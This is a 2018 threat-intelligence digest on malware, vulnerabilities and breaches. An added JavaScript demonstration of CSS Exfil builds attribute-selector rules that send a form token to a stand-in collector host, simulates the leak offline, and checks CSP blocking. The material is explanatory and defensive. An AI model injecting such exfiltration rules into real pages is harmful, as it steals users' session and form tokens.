Cyware Daily Threat Intelligence February 07, 2018

Top Malware Reported in the Last 24 Hours
Gold Dragon implants
Phishing campaigns targeting organizations involved in the 2018 Winter Olympics are delivering a set of malicious implants. Named Gold Dragon, Brave Prince, Ghost419 and RunningRat, these implants are installed only after an initial PowerShell backdoor has established a foothold on the victim.
Gold Dragon, a data-gathering implant, generates a key to encrypt the data it collects from the infected system and sends the encrypted data to a remote server.

Fake Flash update drops CPU miners
Software posing as a Flash Player update is installing CPU miners on victims' computers. The miners spread through fake Facebook video pages that tell users to install Flash Player to continue watching, tricking them into downloading the miner instead.

Top Vulnerabilities Reported in the Last 24 Hours
Adobe released patches
Adobe has released security patches for Flash Player on Windows, Macintosh, Linux and Chrome OS to address two critical vulnerabilities, CVE-2018-4878 and CVE-2018-4877. Both are use-after-free flaws that allow remote code execution, and CVE-2018-4878 was already being exploited in the wild before the patch shipped. Users are advised to update to Adobe Flash Player 28.0.0.161.

Exploitable bug affecting OpenVMS on VAX and Alpha systems
A privilege escalation flaw, CVE-2017-17482, has been found in the OpenVMS operating system running on VAX and Alpha processors. Intel Itanium systems can also be affected when they run in a mixed-architecture cluster with vulnerable nodes. The vulnerability is a buffer overflow in the command-line processing code of the VMS shell, DCL, so a local user who can enter commands may be able to gain elevated privileges.

CSS Exfil attack
CSS Exfil attacks abuse CSS attribute selectors: a stylesheet injected into a page can contain rules that match an element only when one of its attribute values starts with a given string and, on a match, load an attacker-controlled URL, leaking values such as form tokens one character at a time. Any page that lets attacker-controlled CSS reach the browser is exposed. Site operators are advised to deploy a Content Security Policy (CSP), which restricts where stylesheets and image requests may be loaded from and so blocks both the injection and the callback.
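The mechanism described above, as an added example that is not code from Cyware or from the CSS Exfil research: a simulation of the attribute-selector leak against a constructed hidden form field, followed by a minimal check of whether a CSP header would allow the callback request. The collector origin, the hex token alphabet and the victim element are all assumptions made for this demonstration.

```javascript
// Added example (not from the original page): CSS attribute-selector
// exfiltration simulated offline, plus a CSP check for the image callback.
// Assumed: tokens are lowercase hex; the attacker's collector origin and the
// victim element are constructed below.

const ALPHABET = "0123456789abcdef"; // assumed token alphabet

// One rule per candidate next character. In a real attack each rule is a CSS
// line such as
//   input[name="csrf_token"][value^="3f"] { background: url(https://collector.example/3f); }
// The browser fetches the URL only when the value starts with the guessed
// prefix, so the request itself reveals which guess was right.
function buildExfilRules(name, knownPrefix, collector) {
  return Array.from(ALPHABET, (ch) => {
    const guess = knownPrefix + ch;
    return {
      name,
      prefix: guess,
      css: `input[name="${name}"][value^="${guess}"] { background: url(${collector}/${guess}); }`,
      url: `${collector}/${guess}`,
    };
  });
}

// Constructed stand-in for the victim page: the URLs a browser would request
// for an element whose attributes match the injected rules.
function simulateRequests(element, rules) {
  return rules
    .filter((r) => element.name === r.name && element.value.startsWith(r.prefix))
    .map((r) => r.url);
}

// Attacker side: each iteration corresponds to one page load with a fresh
// stylesheet. Exactly one callback fires per round, extending the known prefix
// by one character, until no rule matches (end of value) or maxLen is reached.
function recoverToken(element, name, collector, maxLen) {
  let known = "";
  for (let i = 0; i < maxLen; i++) {
    const hits = simulateRequests(element, buildExfilRules(name, known, collector));
    if (hits.length === 0) break;
    known = hits[0].slice(collector.length + 1);
  }
  return known;
}

// Minimal CSP parsing: "directive source source; directive ..." -> object.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// Background-image loads are governed by img-src, falling back to default-src.
// Handles the common source forms: *, 'self', a scheme such as https:, and an
// exact origin. With no applicable directive the load is unrestricted.
function cspAllowsImage(header, pageOrigin, url) {
  const directives = parseCsp(header);
  const sources = directives["img-src"] ?? directives["default-src"];
  if (sources === undefined) return true;
  const target = new URL(url);
  return sources.some((src) => {
    const s = src.toLowerCase();
    if (s === "*") return true;
    if (s === "'self'") return target.origin === pageOrigin;
    if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return target.protocol === s;
    return target.origin === s;
  });
}

// Constructed victim: a hidden form field carrying a short token.
const VICTIM = { name: "csrf_token", value: "3f9a" };
const COLLECTOR = "https://collector.example"; // assumed attacker origin
console.log(recoverToken(VICTIM, "csrf_token", COLLECTOR, 16)); // "3f9a"
console.log(cspAllowsImage("default-src 'self'", "https://victim.example", `${COLLECTOR}/3`)); // false
```

The loop recovers a four-character token in four page loads with sixteen rules each; a real attack generates the same rules for every position at once and distinguishes them by URL. The CSP check shows the defensive point: a policy whose img-src (or default-src) lists only 'self' or a fixed set of origins never lets the callback reach the collector, and a style-src that excludes 'unsafe-inline' stops the injected stylesheet from being applied at all.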

Top Breaches Reported in the Last 24 Hours
UNC data breach
The University of Northern Colorado (UNC) recently suffered a data breach that exposed the personal information of 12 employees. Attackers used the employees' stolen Social Security numbers to reset their passwords and access their accounts; the victims' W-2 forms were also taken.

DDoS attacks on Final Fantasy XIV network
The network hosting the Final Fantasy XIV game was disrupted by a distributed denial of service (DDoS) attack. Players had difficulty logging in to Worlds in the JP data center and in accessing, sending and receiving data from the JP data centers.
